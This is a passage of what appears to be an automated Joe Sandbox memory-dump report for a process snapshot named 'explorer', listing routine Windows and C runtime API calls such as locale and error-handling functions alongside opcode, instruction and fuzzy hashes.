                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: <_|$<_|
                                                                                                        • API String ID: 0-1441071013
                                                                                                        • Opcode ID: fffdce61ed1db502c30273abf878f1a56e6e2f4649317d4c546406ce1fb92632
                                                                                                        • Instruction ID: 74ceae4105090f1a397ca9074ce6a8c905a6040ad4fd082be59b0d6be1668429
                                                                                                        • Opcode Fuzzy Hash: fffdce61ed1db502c30273abf878f1a56e6e2f4649317d4c546406ce1fb92632
                                                                                                        • Instruction Fuzzy Hash: F5914575A04689CFDB15CF68C490BEEBBF2EF5A300F18465DD89297782D3399506CBA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: <_|$<_|
                                                                                                        • API String ID: 0-1441071013
                                                                                                        • Opcode ID: f06a26e1c6865fe80cd1419a2af81410f39a897a43af3ef3df924d4894b576dc
                                                                                                        • Instruction ID: a5867fe9ca816e452e16399fe30a6607af1b8045f98bc725fc687cdd8a3f263a
                                                                                                        • Opcode Fuzzy Hash: f06a26e1c6865fe80cd1419a2af81410f39a897a43af3ef3df924d4894b576dc
                                                                                                        • Instruction Fuzzy Hash: A5812370A00A458FEB05CF69C890BEEBBB1BF29304F5442ADDC11A7343D7799845DBA0
                                                                                                        APIs
                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0079C462,?,?,00000008,?,?,007A5F42,00000000), ref: 0079C694
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3997070919-0
                                                                                                        • Opcode ID: 2a4573ca30868b80e0b67632bceda82dc6355dc5dafc50e62f267c23acc708f7
                                                                                                        • Instruction ID: d06fb42fa3e66a2bd357066c4f40fd79658785d1c05a9ce7ed6ca403577cc90f
                                                                                                        • Opcode Fuzzy Hash: 2a4573ca30868b80e0b67632bceda82dc6355dc5dafc50e62f267c23acc708f7
                                                                                                        • Instruction Fuzzy Hash: 06B12B32610609DFDF1ACF28D48AB657BA0FF45364F258659E899CF2A1C339E991CF40
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0078A395
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                        • String ID:
                                                                                                        • API String ID: 2325560087-0
                                                                                                        • Opcode ID: 0b1dfa54107567bc0656f423a258b94ed7fb3c5cb1d79f6c3bd4e54d5fac0c23
                                                                                                        • Instruction ID: c8edf397bc9b0e08374eae239f8334457a42cbedd529d54b095a4f1efbbc8075
                                                                                                        • Opcode Fuzzy Hash: 0b1dfa54107567bc0656f423a258b94ed7fb3c5cb1d79f6c3bd4e54d5fac0c23
                                                                                                        • Instruction Fuzzy Hash: 1F51A0B1D01609DFEB14CF59D889BAEB7F0FB48710F24842ED805EB250D379A940CB96
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b2e6f4b4f2f88fe86271aad99a4b1898c6dda765a65f5b50906cc09c7bf88104
                                                                                                        • Instruction ID: 0963b52f38beacc8cb5edbd9fadd7144e48a51c97c176560de0997a24211f2b8
                                                                                                        • Opcode Fuzzy Hash: b2e6f4b4f2f88fe86271aad99a4b1898c6dda765a65f5b50906cc09c7bf88104
                                                                                                        • Instruction Fuzzy Hash: 0E41A1B190461DAFDF24DF69DC89AEABBB9EF45300F1442D9E41DD3211EA399E848F10
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 00796882
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 007968B8
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007A2282
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2003897158-0
                                                                                                        • Opcode ID: 2acad3f92ee63670bd0debdc434c907c069c268808255132ddbb7a517bdce5cb
                                                                                                        • Instruction ID: d27d4ab52f3a120502c30eca610133bbf2f14bafbc92012e11627c58bdccaf02
                                                                                                        • Opcode Fuzzy Hash: 2acad3f92ee63670bd0debdc434c907c069c268808255132ddbb7a517bdce5cb
                                                                                                        • Instruction Fuzzy Hash: 4621B632555206EBDB189A29DC45B7A37A8FF86310B11427AFD02D6182EA3CED419754
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        • EnumSystemLocalesW.KERNEL32(007A1FDB,00000001,00000000,?,-00000050,?,007A2609,00000000,?,?,?,00000055,?), ref: 007A1F27
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: 8bec282c28d3337cfb0ddad5fab7edbb51946edc875178bbe9a25e71269c3a87
                                                                                                        • Instruction ID: ebc895907aee8cf595445ddd4883938621d80e9b4ac0b8be7dfad6b6aeab6749
                                                                                                        • Opcode Fuzzy Hash: 8bec282c28d3337cfb0ddad5fab7edbb51946edc875178bbe9a25e71269c3a87
                                                                                                        • Instruction Fuzzy Hash: 801129362047059FEB189F39C89557AB7A2FFC1358F54452CE9478B740D379A803C740
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007A22D8,00000000,00000000,?), ref: 007A2486
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 3736152602-0
                                                                                                        • Opcode ID: ae85d7909fa0e9bc2ab364467fd97a1ebd78e1cb1d8f7a15cc0fb5fdc5636926
                                                                                                        • Instruction ID: c235b3976df318bf5a30b64b966f190596cfdfed179969e7ff9a2056a8467c93
                                                                                                        • Opcode Fuzzy Hash: ae85d7909fa0e9bc2ab364467fd97a1ebd78e1cb1d8f7a15cc0fb5fdc5636926
                                                                                                        • Instruction Fuzzy Hash: BCF0F932A00155AFDB289A6CC809BBB7754EB85754F044564EC05A7281DA7CFD02C6E0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 00796882
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 007968B8
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 007A1E17
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free$InfoLocale
                                                                                                        • String ID: <Y{$utf8
                                                                                                        • API String ID: 2003897158-1075160420
                                                                                                        • Opcode ID: c9aafe2bee966ac05452045858f16dd459276432a599d1a4a7ca68610388ce3b
                                                                                                        • Instruction ID: dbf6243b791e70ba3ad495a72cb17eceea27c45101b730a6a02351726dfa4b9a
                                                                                                        • Opcode Fuzzy Hash: c9aafe2bee966ac05452045858f16dd459276432a599d1a4a7ca68610388ce3b
                                                                                                        • Instruction Fuzzy Hash: 5BF0A432650109EBDB14AB78EC49EBA37ACDB49351F1442BDE902D7241EA7CAD058794
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        • EnumSystemLocalesW.KERNEL32(007A222E,00000001,FFFFFFFF,?,-00000050,?,007A25CD,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 007A1F9A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 9e7233d460e42581b1913242d7ee62964e8c6687cad7d479f55e48e80ed49a94
• Instruction ID: c0044872425fc7e91358419cec071e9859258f790ccc1cb0b699adbcef48c2bf
• Opcode Fuzzy Hash: 9e7233d460e42581b1913242d7ee62964e8c6687cad7d479f55e48e80ed49a94
• Instruction Fuzzy Hash: 52F0F6366013445FEB245F79AC85A7A7B95FFC1368F09862DF9054B680C779AC02D750
APIs
  • Part of subcall function 00792100: EnterCriticalSection.KERNEL32(-00047B11,?,00793427,00000000,007C3028,0000000C,007933EE,?,?,0079A24D,?,?,007969C2,00000001,00000364,00000006), ref: 0079210F
• EnumSystemLocalesW.KERNEL32(00797EFF,00000001,007C3248,0000000C,0079832A,00000000), ref: 00797F44
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 036fee09e35bbc7f9b2330aef8f600e0c621df3e584108127050d075fc873e12
• Instruction ID: f845e6d682d776458ba12876633cde9dbe3b13f2b5a28c97d7d3f384da1b07f0
• Opcode Fuzzy Hash: 036fee09e35bbc7f9b2330aef8f600e0c621df3e584108127050d075fc873e12
• Instruction Fuzzy Hash: 44F0F972A54218EFDB04EF98E846F9D77F0EB48721F10815AF410AB2A1DBBD5941CF46
APIs
  • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
  • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
• EnumSystemLocalesW.KERNEL32(007A1DC3,00000001,FFFFFFFF,?,?,007A262B,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 007A1EA1
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: d97dd638c6f6aef1c5709c60a8650be22d8114d50400c04d0d9449984d7b3744
• Instruction ID: 9164ca26813770768bee8518fa2e1670b867779ffc1955e04f77ba3f8cce217f
• Opcode Fuzzy Hash: d97dd638c6f6aef1c5709c60a8650be22d8114d50400c04d0d9449984d7b3744
• Instruction Fuzzy Hash: 71F0AB3A30020857DB049F39E809B6B7F94EFC27A1F464158EE058B240C679D842C7D0
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00795784,?,20001004,00000000,00000002,?,?,00794D91), ref: 00798462
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 0ad47061207436b01a9737c2898f032f3a056584f49b922a282827cc2e8bb19c
• Instruction ID: 25b9836f6b47df695f4ee15f7b43af02ec14f4f5e1c66176c641b49af982d793
• Opcode Fuzzy Hash: 0ad47061207436b01a9737c2898f032f3a056584f49b922a282827cc2e8bb19c
• Instruction Fuzzy Hash: 5DE04F3254021CBBCF122F64EC08EAE7F15EF45761F008510FD0566261CF398920AAE6
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID: z
• API String ID: 0-1657960367
• Opcode ID: 4c083d682b8d6a821b7a272f76fb90df478801e172e5b40452a19925f7606558
• Instruction ID: 586fd52a5f2336967c3a6d0fe10d5b45d4834231e0d9b6966418821e008dc927
• Opcode Fuzzy Hash: 4c083d682b8d6a821b7a272f76fb90df478801e172e5b40452a19925f7606558
• Instruction Fuzzy Hash: F051E670B01729DBDF94AFE48CD86AEB6B5AF48300F1005AEE509D7311DE789D498B81
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c248ef47a0ae500ba22a05f4c36954a30670ec2be6e79b0cc36b296fff902298
• Instruction ID: cb89fb46aaebc4cfbacebbebeb476058102050ed6e1ce1a54bb97a3f3600a3c7
• Opcode Fuzzy Hash: c248ef47a0ae500ba22a05f4c36954a30670ec2be6e79b0cc36b296fff902298
• Instruction Fuzzy Hash: 68224FB3F515145BDB0CCA5DDCA27EDB3E3AFD8218B0E803DA40AE3345EA79D9158648
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ebc160c4fe94ffb9e23890b96cafdd61019fb64869369ba1857a6f8c83f4dfcf
• Instruction ID: 5f8d11a978df18178cc9efc17417896da4dc877c2b344046ebec38fe7ca9a198
• Opcode Fuzzy Hash: ebc160c4fe94ffb9e23890b96cafdd61019fb64869369ba1857a6f8c83f4dfcf
• Instruction Fuzzy Hash: A6321662D29F414DDB339638E832336A648AFB73C5F15D727F819B59A6EB2CC8834101
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
• String ID:
• API String ID: 4283097504-0
• Opcode ID: f304543061a74a604e2e7f5a8fa2c2c52bbe04bf861166e073d64f28799fdfd5
• Instruction ID: 61537830ad3103184e61870dbd480e418f7ab9d1d076d35e7d222c3da186314b
• Opcode Fuzzy Hash: f304543061a74a604e2e7f5a8fa2c2c52bbe04bf861166e073d64f28799fdfd5
• Instruction Fuzzy Hash: E2B1FA755007458BEB389F24CC96AB7B3E9EF86304F94462DE983C6580EA7DF985C710
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 54fe28e80fb72b583481cea6b7f81cf34f8de984378f0d41b8157c74fa951865
• Instruction ID: 1a3558871a915df1527fc5452ae4e15f11f3b05e21613ff64021842745878cf0
• Opcode Fuzzy Hash: 54fe28e80fb72b583481cea6b7f81cf34f8de984378f0d41b8157c74fa951865
• Instruction Fuzzy Hash: 8C51AB716C06C897DF38BE2C8499BBF679A9F12304F64403FE44AD7292D61DDD4A8362
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
